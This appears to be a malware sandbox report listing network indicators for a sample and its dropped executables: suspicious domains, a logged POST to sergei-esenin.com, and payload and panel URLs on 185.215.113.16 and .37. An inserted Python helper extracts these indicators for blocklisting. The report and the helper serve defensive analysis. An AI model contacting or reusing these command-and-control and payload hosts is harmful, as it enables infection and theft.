Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ine' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: owered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://ww equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://nimbus/ExperimentAPI.sys.mjsresource:///modules/AboutNewTab.sys.mjsresource:///modules/CustomizableUI.sys.mjsresource://gre/modules/TelemetrySession.sys.mjsbrowser.migrate.interactions.bookmarksbrowser.migrate.interactions.csvpasswordsFXA_ATTACHED_CLIENTS_UPDATE_INTERVAL*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.stea> equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Thu, 24 Oct 2024 16:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlU80XxykVYXECvBNVn09ItjFQrnzU8iKuNtTYuET0C6bWQ1QFZ9lgPVtbWfEgy2qrnwv%2BAuvjWg10xT1LfJ0Q6xDD9D9%2BYBWah6DcfpbkaQ4%2FZ9JLDgn9lbJ1loFt1WXRXYzA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7b39269ac7e7c7-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Thu, 24 Oct 2024 16:09:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqWZHzPoRHt5jTPR%2FLd5ph90vo5RgBXdXLba3UG9HB%2BwiAitOuyZIByDVOlpMgdPMEgji4xKBH29hWXBAaZ0%2Be2tXsM3pdjxPcbv8N05AwuoQA7OlmMnyz%2B5z34SemQ2j0Nkgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7b3b5319784782-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Thu, 24 Oct 2024 16:09:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVgP%2FpJAkODjj9ZyKIQSqCe5320uD7IlWdEv2xxHsrZNnJf2UDxpE%2BCqyFFPWjBuCc30clNcIiUXYAgdnzQpYe6wunxdRknx9ao0GjhFcbrtSHaKKXGIdzd5vzRQ9%2FdCTqJiNA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7b3b8b5a2153c6-ATL
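Added triage example (not part of the sandbox report and not the vendor's tooling): the DNS queries and the POST /api to sergei-esenin.com above, together with the "String found in binary or memory" URL entries that follow, mix real C2 indicators with Firefox/Mozilla telemetry, certificate-revocation endpoints, the sites the sandbox opened in the browser, and memory-carving residue such as random.exeU, e2b1563c6670f193.phpindows and 185.215.113.37Family. The script below parses lines in this report's format, strips that residue, drops loopback and allowlisted benign infrastructure, and returns the remaining hosts, URLs and HTTP requests. The allowlist and the sample lines are constructed from what is on this page (Source memory-region fields abbreviated); steamcommunity.com is deliberately kept, because the report shows Steam Community CSP strings inside file.exe and 26e226f915.exe memory, so that contact came from the sample rather than from Firefox, which is consistent with a legitimate page being used as a dead-drop resolver.

```python
"""Added triage helper: pull network IOCs out of sandbox-report lines and
separate them from sandbox/browser noise. Not part of the original report."""
import ipaddress
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

# Benign infrastructure present in this report (suffix match): Mozilla telemetry,
# CA endpoints, schema/spec URIs and the sites the sandbox opened in Firefox.
BENIGN_SUFFIXES = (
    "mozilla.com", "mozilla.org", "mozilla.net", "mozgcp.net", "firefox.com",
    "getpocket.com", "youtube.com", "google.com", "facebook.com", "wikipedia.org",
    "wikimedia.org", "reddit.com", "twitter.com", "fastly.net", "example.org",
    "ipv4only.arpa", "digicert.com", "amazontrust.com", "a9.com", "json-schema.org",
)
# steamcommunity.com is intentionally absent: the report shows Steam CSP strings
# inside the sample's own memory, so that contact is worth keeping as an indicator.

DNS_RE = re.compile(r"DNS query: (\S+)")
URL_RE = re.compile(r"String found in binary or memory: (https?://\S+)")
# Request line followed by its Host header; works whether the report flattened the
# headers onto one line or kept them on separate lines, but never crosses into
# the next "Source:" finding.
HTTP_RE = re.compile(
    r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01](?:(?!Source: ).)*?Host: ([A-Za-z0-9.-]+)",
    re.DOTALL,
)
IPV4_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})")
# Carved strings often carry the bytes that followed the real terminator
# ("random.exeU", "...php7", "...phpindows"): cut after a known extension.
EXT_RE = re.compile(r"(\.(?:exe|dll|php|crt|crl|cer|txt))[^/?#]*$")
# Whatever survives must still look like a URL path, so residue like "/O(" is dropped.
PATH_OK_RE = re.compile(r"^[A-Za-z0-9._~/-]*$")


def is_benign(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def normalise_url(raw: str) -> Optional[str]:
    """Clean one carved URL; return None for loopback, junk paths or bad hosts."""
    parts = urlsplit(raw)
    host = parts.hostname or ""
    m = IPV4_RE.match(host)
    if m:
        host = m.group(1)  # drops residue glued to an IP literal ("...37Family")
        try:
            if ipaddress.ip_address(host).is_loopback:
                return None
        except ValueError:
            return None
    try:
        port = f":{parts.port}" if parts.port else ""
    except ValueError:  # malformed port such as "http://127.0.0.1:"
        port = ""
    path = EXT_RE.sub(r"\1", parts.path)
    if not host or not PATH_OK_RE.match(path):
        return None
    return f"{parts.scheme}://{host}{port}{path}"


def extract_iocs(report_text: str) -> Dict[str, list]:
    dns, urls = set(), set()
    for line in report_text.splitlines():
        m = DNS_RE.search(line)
        if m:
            if not is_benign(m.group(1)):
                dns.add(m.group(1))
            continue
        m = URL_RE.search(line)
        if m:
            url = normalise_url(m.group(1))
            if url and not is_benign(urlsplit(url).hostname or ""):
                urls.add(url)
    http = sorted(set(HTTP_RE.findall(report_text)))
    hosts = dns | {urlsplit(u).hostname for u in urls} | {h for _, _, h in http}
    return {"dns": sorted(dns), "urls": sorted(urls), "http": http, "hosts": sorted(hosts)}


# Constructed sample: lines taken from this report's network findings, with the
# Source memory-region identifiers abbreviated.
SAMPLE_REPORT = """\
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 16:08:02 GMTServer: cloudflareCF-RAY: 8d7b39269ac7e7c7-DFW
Source: 26e226f915.exe (sdmp) String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 26e226f915.exe (sdmp) String found in binary or memory: http://185.215.113.16/mine/random.exeU
Source: file.exe (sdmp) String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: 26e226f915.exe (sdmp) String found in binary or memory: http://185.215.113.16/gw
Source: ef2532c0b1.exe (sdmp) String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpindows
Source: ef2532c0b1.exe (sdmp) String found in binary or memory: http://185.215.113.37Family
Source: ef2532c0b1.exe (sdmp) String found in binary or memory: http://185.215.113.37/O(
Source: 26e226f915.exe (sdmp) String found in binary or memory: http://127.0.0.1:27060
Source: file.exe (sdmp) String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
"""

if __name__ == "__main__":
    for kind, items in extract_iocs(SAMPLE_REPORT).items():
        print(kind, *items, sep="\n  ")
```

Run it against the full report text instead of SAMPLE_REPORT and the output is a blocklist-ready set of hosts and URLs; extend BENIGN_SUFFIXES with whatever your own sandbox image contacts at idle before trusting the result.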
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3277613041.0000017081144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.000001708525B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 26e226f915.exe, 0000000D.00000003.3294085601.0000000001692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3294085601.0000000001692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/gw
Source: 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000162B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeU
Source: 26e226f915.exe, 0000000D.00000003.3288342561.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exer
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000162B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe0
Source: 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeOe
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/O(
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000001044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000001044000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpindows
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.000000000105B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37Family
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37rpn
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084FA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#Not
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#Instance
